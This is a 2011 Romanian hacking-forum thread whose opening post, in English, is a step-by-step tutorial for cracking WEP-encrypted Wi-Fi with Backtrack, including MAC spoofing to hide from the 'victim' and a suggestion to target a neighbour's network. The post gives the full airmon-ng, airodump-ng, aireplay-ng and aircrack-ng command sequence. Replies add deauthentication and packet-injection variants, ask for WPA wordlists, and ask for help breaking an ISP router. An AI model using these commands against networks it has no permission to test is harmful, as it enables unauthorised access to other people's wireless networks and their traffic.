Nytro Posted May 10, 2011 Report Posted May 10, 2011 How To Crack WEP using Backtrack w/Pictures Author: WarlockThis tutorial is strictly educational, neither I, nor leetcoders is responsible for whatever trouble you may get into by using this method.Tinypic killed a couple of my images, I'm sure you can still manage to do it.Welcome to my tutorial, by the end of this tutorial, you should be able to have cracked your (or your nearby neighbors) WEP encrypted wifi.What you need:Backtrack 3 or 4 (In this tutorial I used 3, since I had it laying around) Which you can get here; DownloadsA computer with a compatible wireless card (if you have a newer computer, this will most likely work on your machine)PatienceAssuming you've already downloaded backtrack, and burned it using your favorite burning software, restart your computer with the backtrack disc, since it can be used as a livecd.First of all, before you do anything, navigate to the wireless assistant;Start>Internet>Wireless AssistantIf you do not see any networks, then this will not work for you.Open the konsole, which is here;Now type, airmon-ngIt should show you your wireless card's info, like so;Now type airmon-ng stop (your interface)Should show you this;Now type ifconfig (your interface) downThen type macchanger --mac 00:11:22:33:44:55 (your interface)This spoofs your mac address, so your victim cannot figure out who you are.Type airodump-ng (your interface)This will open up a new konsole.Once you see the network you want to attack, press CTRL+C (This will stop your wirless card from searching for new networks)Open a new konsoleType airodump-ng -c (channel) -w (file name) --bssid (bssid) (your interface)Like so;It will open up yet another konsole. Now let it run for a few minutes (until it reaches about 5000 or so packets, the more the better chance of cracking it.)Go watch a video on youtube, or go on HF, any network activity will increase the amount of packets you pickup.Open another konsole and type aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (your interface)Type aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (your interface)Let it run for about 5 minutes, while it collects the packets. Then press CTRL+CNow type aircrack-ng -b (bssid) (filename-01.cap) You have found the WEP key, mine being 77838557744334834238286364 (without the colons)And you're done!~Warlock Sursa: LeetCoders Quote
SaNuFuri Posted June 8, 2011 Report Posted June 8, 2011 Salut, am o mica prb , rulez backtrack prin virtualbox in win , si prb e ca aduna greu data, a adunat 330 in 17 ore .. beacons sunt 530000+ ... de ce oare? Quote
wildchild Posted June 8, 2011 Report Posted June 8, 2011 (edited) probabil n-ai facut bine injectia sau chipset-ul nu este patchuit ca sa injecteze pachete cum trebuie.in orice caz, sansa sa aduni cat mai multe iti creste odata ce acel network lucreaza.daca vezi ca mac-ul victimei este conectat si foloseste internetul(poti folosi wireshark sa faci sniffing pe w ethernet), atunci este momentul cel mai prielnic sa aduni IVsLE:in loc de ultimele 2 comenzi aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (your interface) & aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (your interface) eu foloseam mereu metoda personala pentru ca mergea mai bine asa aireplay-ng --arpreplay -e blabla -b bl:aa:aa:aa -h 00:11:12:13:14:0D mon0 & aireplay-ng --deauth 10 -a 00:19:5B:E7:52:70 -c 00:12:17:94:90:0D mon0 Edited June 8, 2011 by wildchild Quote
zenit Posted June 16, 2011 Report Posted June 16, 2011 Am incercat de mi-au sarit ochii, am lasat laptopul in jur de 8 ore sa colecteze pach-uri si degeaba, am depasit 20000 si tot cerea. Quote
sorelian Posted June 17, 2011 Report Posted June 17, 2011 (edited) Pe AP-ul ala cu WEP ,in alea 8 ore ,ai avut client asociat ?Daca DA ,atunci in max 15 min trebuia sa ai cheia .Daca NU ,atunci e mai greu...Cateodata e nevoie chiar de peste 50000 de data (IVs) Edited June 17, 2011 by sorelian Quote
lrdbilly Posted June 26, 2011 Report Posted June 26, 2011 pentru cei ce au #Data mic si creste greu sau nu creste deloc dupa ce dati comanda de asociere aireplay-ng -1 0 -a etc. si zice Association successfull dati aireplay-ng -1 -p 0841 -c FF:FF:FF:FF:FF:FF -b TARGET MAC PLACA WIRELESS (eg. wlan or mon).cand a prins pachetul o sa trebuiasaca sa dati Y si #Data are trebui sa creasca considerabil. Aceasta comanda o sa reduca considerabil timpul de spargere a unei retele. Quote
hammerfall Posted June 27, 2011 Report Posted June 27, 2011 poti folosi metoda si pe Linux...Dracia dracului. Tu-ti dai seama? In plus tutorialul e facut pe BackTrack un sistem de operare ce nu are nici cea mai mica legatura cu Linux. [ironic] Quote
Românescu Posted July 5, 2011 Report Posted July 5, 2011 Am folosit pana acum backtrack5 si 4 pe vmware workstation 7.1.4 build-385536 si am windows7.Am adaptor wireless Broadcom 802.11 pe laptop hp625.Problema: nu-mi recunoaste adaptorul!! Am tot rascolit googleu pt raspunsuri si nimic clar. Acum mi se ia backtrack 3, si 2 nu mai gasesc pe nicaieri, probabil pe astea sa vrea. Stie cineva de ce nu-l recunoaste? Trebuie instalate niste drivere specifice, copiezi dll-uri ?!?! Quote
MSn Posted August 30, 2011 Report Posted August 30, 2011 Am BT3 final.Daca il mai cauti, da un PM. Quote
agstrato Posted September 22, 2011 Report Posted September 22, 2011 (edited) Salut. La cei care nu va merge bine luati-va o placa cu chipset Atheros . Un chipset care merge bine rau de tot este realtek rtl 8187 maj passwordurilor sunt de 11 sau de 13 (depinde in ce tara va aflati) si le scoate cam la 28000/35000 date. cheia poate fi scrisa in ascii sau nr de ex un 0 este defapt un 30. Am vazut mai sus la poze ca se skimba mac-ul si etc. Backtrack cat si restu de editii care fac wlanaudit(haxpuppy wifiway wifislax) nu mai trebuie skimbat nimik mac ii dai direct mon0 si ia macu placii automat. Ah si majoritatea au si un autoscript.sh ceva de genul asta daca nu va descurcati chiar are optiune sa aleaga si sa sparga singur. Ideea este oricat de lunga e parola (26) cu suficiente date tot il iei . Cateodata mai gastiti modemuri care se filtreaza altele pe care nu se asociaza si Canalul 13 nush daca o sa auziti pe cineva sa ia modem pe 13 ). La cei care nu va merge grafica la backtrack folositi screen. Iar am vazut mai sus ca cineva vb despre metoda reproducerii paketelor care nu este o idee chiar buna. pt ca poti prinde 1 paket nasol si sal reproduca la max degeaba ca defapt paketele sunt najpa. De ex in timp ce scanati daca vreti sa vedeti cateva ARP si cateva date luati tel cu wifi bagati o parola de 11 sau de 13 char si tot face date/ARP asta nu inseamna ca paketul este bun. Daca aveti tel cu android puteti cauta versiunea pt el: automatikwlan ii zice . si pt cei care stati in spania daca vreti sa invatati sa luati WPA va pot ajuta. Inca ceva folositor: toti vrem sa aflam unde se afla wlanurile astea sa le prindem mai bine etc si ne plimbam cu laptopu prin casa. Ei bine nu putem sti exact pozitia dar (exista un gps pt asa ceva dar e ceva cam scump) putem sti cand suntem mai aproape de modem sau mai departe. Va uitati ce gateway aveti deskideti 1 cmd si dati ping -t gatewayul vostru. Cu cat e mai mic cu atat sunteti mai aproape. Aici aveti o lista de adapters care intra in monitor mode sa nu va incurcati aiurea: http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#which_is_the_best_card_to_buy Edited September 22, 2011 by agstrato Quote
n00b_demivirus Posted October 4, 2011 Report Posted October 4, 2011 am obtinut si eu key-ul de la retea si nu stiu ce dreaq sa fac cu el. nu merge convertor ascii. o pot folosi undeva hexa? am win xp, key e A2:9B:83:C7:2B:82:CE:04:BE:F2:96:5C:A3multumesc anticiipat Quote
DrPsychO Posted October 25, 2011 Report Posted October 25, 2011 "Open a new konsoleType airodump-ng -c (channel) -w (file name) --bssid (bssid) (your interface)Like so; "In cazul de mai sus file name e "hackforums" cred.Ce e cu acel file? Ce trebuie sa contina? Quote
Nytro Posted October 25, 2011 Author Report Posted October 25, 2011 Cred ca acum e --channel in loc de -c.In acel fisier se salveaza pachetele (nu intregi) necesare pentru spargerea parolei. Nici eu nu stiu prea multe in acest domeniu, pune un nume de fisier, pe care sa il tii minte, il vei folosi cu aircrack. Quote
l34k Posted October 25, 2011 Report Posted October 25, 2011 Uneori problemele apar de la chipset. Cred ca cea mai buna alegere pentru NIC-ul wireless ar fi cel cu chipset intel. Quote
devacanta Posted October 25, 2011 Report Posted October 25, 2011 "Open a new konsoleType airodump-ng -c (channel) -w (file name) --bssid (bssid) (your interface)Like so; "In cazul de mai sus file name e "hackforums" cred.Ce e cu acel file? Ce trebuie sa contina?poti sa pui ce vrei la nume, acolo se salveaza pachetele receptionate de airodumo-ng , iti trebuie pentru aircrack-ng uite aici si un video tutorial : Quote
DrPsychO Posted October 25, 2011 Report Posted October 25, 2011 mc (:care e diferenta intre 3 si 5? pe site-ul lor am vazut ca se poate downloada 5 si 5 R1Este vreo dif intre 3 si 5? Quote
Nytro Posted October 25, 2011 Author Report Posted October 25, 2011 Sunt diferente:- versiunea de kernel si driverele pentru placile de retea suportate - patch-urile pentru drivere ca sa suporte packet injection (sau cum se cheama)- versiunile de airmon/aircrack... pe langa celelalte utilitareDeci, cel putin in teorie, 5 ar trebui sa aiba multe plusuri fata de 3.PS: Aceste diferente nu prea sunt "vizibile" de obicei, poate doar sa folosesti --channel in loc de -c. Quote
co4ie Posted October 25, 2011 Report Posted October 25, 2011 Depinde de comanda pe care o dai ... la airmon-ng trebuie --channel , la airodump-ng merge -c !! Plusurile nu sunt decat daca ai backtrack 3 fara update-uri ... daca faci update la aircrack in backtrack 3 va fi acelasi cu cel din backtrack 5 ! Oricum singurile schimbari sunt update-urile la driverele de injectie de pachete , comenzile sunt aceleasi iar daca ai vreo nedumerire poti da aricrack-ng --help sau RTFM !! Quote
DrPsychO Posted October 25, 2011 Report Posted October 25, 2011 din cate am inteles balanta se inclina inspre GNOME fiind mai accesibil [KDE fiind putin mai complicat/complex],KDE ar avea ceva mai multe buguri dar o grafica mai atragatoare.Pentru cei care l-au folosit la WEP crack, ce imi recomandati?Nytro : Mc mult pentru ajutor si sugestii (: Quote
co4ie Posted October 25, 2011 Report Posted October 25, 2011 Eu folosesc KDE ... Cel mai bine le incerci pe amandoua... cu care te intelegi mai bine cu ala lucrezi in continuare ! Comenzile difera de la unul la altul dar nu cred ca asta ar fi o problema !! Quote
adonisslanic Posted October 25, 2011 Report Posted October 25, 2011 Lol fratilor, nu conteaza desktop enviromentul!!!! E doar o chestie de preferinta <(T^T)> nu are nicio legatura cu functionalitatea programelor gen suita aircrack-ng O_O Tot in consola o sa lucrati in orice desktop env. D-asta s-au si pus mai multe "arome" la Backtrack odata cu a cincea iteratie a acestei distributii.... Quote
co4ie Posted October 25, 2011 Report Posted October 25, 2011 Lol fratilor, nu conteaza desktop enviromentul!!!! E doar o chestie de preferinta <(T^T)> nu are nicio legatura cu functionalitatea programelor gen suita aircrack-ng O_O Tot in consola o sa lucrati in orice desktop env. D-asta s-au si pus mai multe "arome" la Backtrack odata cu a cincea iteratie a acestei distributii....nu ai vazut ce am scris mai sus? sa le incerce pe amandoua si sa se decida singur... fiecare dupoa preferinte ... Quote
Mircea88 Posted October 25, 2011 Report Posted October 25, 2011 are cineva un dictionar wpa romanesc? dar nu de 7gb...sa stau 'nspe mii de ore.. Quote
Ellimist Posted October 25, 2011 Report Posted October 25, 2011 E vreo sansa sa spargi asa parola WEP de la un router din ala de la romtelecom care e ceva de genul :J45HK3FSIFU3NJ2NM3 ? Quote